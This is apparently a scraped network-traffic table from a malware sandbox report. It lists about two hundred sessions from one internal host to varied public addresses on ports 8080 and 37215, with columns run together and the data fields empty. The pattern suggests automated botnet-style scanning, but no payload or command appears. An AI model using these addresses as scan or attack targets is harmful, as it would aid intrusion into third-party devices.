                                                        36094192.168.2.2356874197.62.59.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36095192.168.2.2352142159.63.12.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36096192.168.2.234307472.87.76.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36097192.168.2.235507096.156.13.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36098192.168.2.234699285.187.64.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36099192.168.2.235826280.100.47.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36100192.168.2.235433857.97.73.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36101192.168.2.2354954176.94.145.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36102192.168.2.2336290170.226.23.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36103192.168.2.2336716116.171.191.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36104192.168.2.2352284107.220.199.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36105192.168.2.2356260209.218.33.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36106192.168.2.233352612.115.133.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36107192.168.2.2358478105.88.108.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36108192.168.2.2341118114.161.230.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36109192.168.2.234871881.163.254.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36110192.168.2.2345860118.156.205.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36111192.168.2.233359078.47.220.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36112192.168.2.2344130129.46.108.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36113192.168.2.233965644.84.167.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36114192.168.2.2346470175.227.186.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36115192.168.2.235595292.171.20.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36116192.168.2.2340414193.246.100.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36117192.168.2.233582077.146.97.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36118192.168.2.2358920209.148.25.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36119192.168.2.233552060.31.18.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36120192.168.2.2357748107.248.42.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36121192.168.2.234481253.3.167.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36122192.168.2.2348798191.43.124.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36123192.168.2.23339304.52.199.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36124192.168.2.233700413.106.166.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36125192.168.2.2338050131.39.72.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36126192.168.2.234906084.99.109.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36127192.168.2.2352774119.198.237.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36128192.168.2.2358454200.212.34.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36129192.168.2.235802295.0.160.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36130192.168.2.2349146183.164.105.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36131192.168.2.234397040.231.92.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36132192.168.2.2356272104.71.57.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36133192.168.2.2352816202.43.42.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36134192.168.2.233739661.84.76.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36135192.168.2.2353310100.8.54.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36136192.168.2.234284860.101.128.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36137192.168.2.234391688.192.187.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36138192.168.2.234148888.240.231.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36139192.168.2.233355084.119.79.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36140192.168.2.235293224.174.200.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36141192.168.2.2350084184.236.147.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36142192.168.2.2343170168.91.62.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36143192.168.2.234020649.9.151.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36144192.168.2.2334520187.108.142.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36145192.168.2.2358668221.112.197.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36146192.168.2.2354596123.206.132.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36147192.168.2.2336546129.249.74.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36148192.168.2.2355692191.8.158.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36149192.168.2.2341686139.229.90.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36150192.168.2.2342390212.80.40.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36151192.168.2.235609066.149.52.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36152192.168.2.2349294136.231.215.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36153192.168.2.233856081.168.69.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36154192.168.2.2356390189.199.253.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36155192.168.2.235460638.153.214.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36156192.168.2.235272234.172.183.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36157192.168.2.2346854119.207.9.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36158192.168.2.2356642199.231.44.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36159192.168.2.235375475.7.41.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36160192.168.2.233734032.22.4.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36161192.168.2.2339854197.123.231.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36162192.168.2.234155217.187.172.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36163192.168.2.2338410117.157.51.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36164192.168.2.2345858140.8.227.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36165192.168.2.2343200220.22.118.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36166192.168.2.233669434.152.194.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36167192.168.2.2345960217.145.72.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36168192.168.2.234093618.50.110.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36169192.168.2.2344272200.142.116.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36170192.168.2.234947277.219.250.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36171192.168.2.2338996153.210.99.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36172192.168.2.235742293.37.56.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36173192.168.2.2339464120.221.209.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36174192.168.2.234011483.118.240.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36175192.168.2.233496832.171.71.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36176192.168.2.2349542218.114.99.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36177192.168.2.2338324177.53.83.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36178192.168.2.2349920169.173.53.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36179192.168.2.2359970176.107.28.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36180192.168.2.2336252151.230.120.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36181192.168.2.234721627.122.167.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36182192.168.2.2356322133.11.83.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36183192.168.2.234764443.68.214.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36184192.168.2.2357388203.188.30.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36185192.168.2.2349518209.200.8.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36186192.168.2.23438462.26.201.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36187192.168.2.234178466.227.104.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36188192.168.2.2341444156.217.207.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36189192.168.2.2337616212.137.19.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36190192.168.2.2354288210.149.244.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36191192.168.2.2347290101.33.34.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36192192.168.2.2355008115.190.187.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36193192.168.2.2336830211.241.188.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36194192.168.2.233856491.148.196.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36195192.168.2.233818086.240.52.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36196192.168.2.233675660.37.248.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36197192.168.2.2355996222.235.130.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36198192.168.2.2358664119.19.7.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36199192.168.2.235299685.231.3.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36200192.168.2.234624074.229.151.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36201192.168.2.2356154193.64.235.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36202192.168.2.2358836196.92.80.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36203192.168.2.2348198152.36.24.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36204192.168.2.235303463.70.205.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36205192.168.2.2360490117.45.202.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36206192.168.2.2356728180.14.53.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36207192.168.2.2352460222.237.161.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36208192.168.2.234854635.207.139.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36209192.168.2.2338658175.196.96.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36210192.168.2.2345208102.241.54.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36211192.168.2.235847639.16.72.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36212192.168.2.2344466125.15.209.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36213192.168.2.234593453.87.72.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36214192.168.2.235055685.178.92.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36215192.168.2.2339194169.79.242.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36216192.168.2.235113659.199.109.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36217192.168.2.2340460104.120.218.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36218192.168.2.235026058.201.196.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36219192.168.2.2348468103.178.49.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36220192.168.2.2356398205.198.189.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36221192.168.2.2334600190.91.200.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36222192.168.2.235953049.95.133.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36223192.168.2.235280874.186.101.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36224192.168.2.2352104161.215.179.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36225192.168.2.234459291.77.233.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36226192.168.2.2341380115.37.204.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36227192.168.2.234791623.37.240.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36228192.168.2.233480473.81.19.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36229192.168.2.234363473.95.108.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36230192.168.2.2347094171.116.131.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36231192.168.2.2358978128.169.182.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36232192.168.2.234229686.12.3.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36233192.168.2.2355750162.96.151.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36234192.168.2.2350910183.48.73.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36235192.168.2.2360762168.17.96.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36236192.168.2.234920617.120.83.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36237192.168.2.2357604207.75.107.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36238192.168.2.2350446184.237.174.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36239192.168.2.2357158206.248.28.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36240192.168.2.235018076.53.199.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36241192.168.2.235301854.74.3.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36242192.168.2.2353234149.1.153.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36243192.168.2.235614427.55.142.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36244192.168.2.233495413.153.14.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36245192.168.2.234608246.202.186.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36246192.168.2.2342216222.87.86.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36247192.168.2.2356988185.230.48.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36248192.168.2.2337520180.171.65.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36249192.168.2.2348436217.74.68.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36250192.168.2.234990023.161.99.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36251192.168.2.235585617.13.161.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36252192.168.2.2351656112.40.78.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36253192.168.2.2339092185.101.70.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36254192.168.2.234103218.28.2.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36255192.168.2.233695883.164.69.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36256192.168.2.2346766189.197.72.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36257192.168.2.2339272123.227.59.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36258192.168.2.233383041.46.160.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36259192.168.2.235436241.178.124.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36260192.168.2.2348682197.249.203.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36261192.168.2.2353408197.127.27.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36262192.168.2.2335434197.101.211.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36263192.168.2.236045041.101.116.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36264192.168.2.233842632.5.14.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36265192.168.2.2357788157.166.185.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36266192.168.2.235868441.151.37.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36267192.168.2.2335672157.68.109.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36268192.168.2.2333768157.69.173.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36269192.168.2.2354692197.206.95.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36270192.168.2.2343314157.246.118.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36271192.168.2.2356222197.93.49.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36272192.168.2.2336466157.231.134.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36273192.168.2.2359368102.131.175.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36274192.168.2.2335632110.87.42.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36275192.168.2.2348844197.161.98.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36276192.168.2.2357428188.167.111.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36277192.168.2.235766841.111.212.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36278192.168.2.235074883.45.136.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36279192.168.2.233487441.159.91.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36280192.168.2.235837641.60.181.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36281192.168.2.2353906157.153.17.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36282192.168.2.2354422129.161.145.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36283192.168.2.2342738157.98.31.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36284192.168.2.234602441.135.175.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36285192.168.2.2341626157.140.144.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36286192.168.2.2351136197.149.195.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36287192.168.2.2345840157.186.29.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36288192.168.2.236075241.255.128.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36289192.168.2.2340354187.186.126.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36290192.168.2.2352672197.177.253.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36291192.168.2.233896041.135.168.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36292192.168.2.2349066223.21.16.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36293192.168.2.235552257.217.244.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36294192.168.2.235091841.123.90.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36295192.168.2.2336738157.225.122.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36296192.168.2.2334090187.250.130.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36297192.168.2.2348878197.84.130.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36298192.168.2.2342682157.75.48.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36299192.168.2.235429860.201.185.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36300192.168.2.234614464.233.79.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36301192.168.2.2338448157.47.104.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36302192.168.2.2338250197.150.125.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36303192.168.2.234867041.251.46.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36304192.168.2.2349426168.249.111.9637215
